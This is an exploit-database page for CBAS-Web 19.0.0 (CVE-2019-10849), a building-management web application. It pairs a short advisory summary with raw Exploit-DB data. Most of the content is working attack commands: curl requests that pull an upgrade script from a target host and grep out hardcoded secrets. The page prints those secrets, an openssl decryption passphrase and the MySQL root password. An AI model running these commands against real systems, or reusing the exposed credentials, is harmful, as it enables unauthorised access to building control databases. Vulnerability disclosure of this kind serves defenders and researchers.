header-logo
Suggest Exploit
vendor:
CBAS-Web
by:
LiquidWorm
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: CBAS-Web
Affected Version From: 19.0.0
Affected Version To: 19.0.0
Patch Exists: YES
Related CWE: CVE-2019-10849
CPE: a:computrols:cbas-web:19.0.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: NA
2019

CBAS-Web 19.0.0 – Information Disclosure

CBAS-Web 19.0.0 is vulnerable to an information disclosure vulnerability due to the presence of hardcoded credentials in the restore_sql_db.sh script. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of CBAS-Web.
Source

Exploit-DB raw data:

# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10849
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz

$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
#    mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"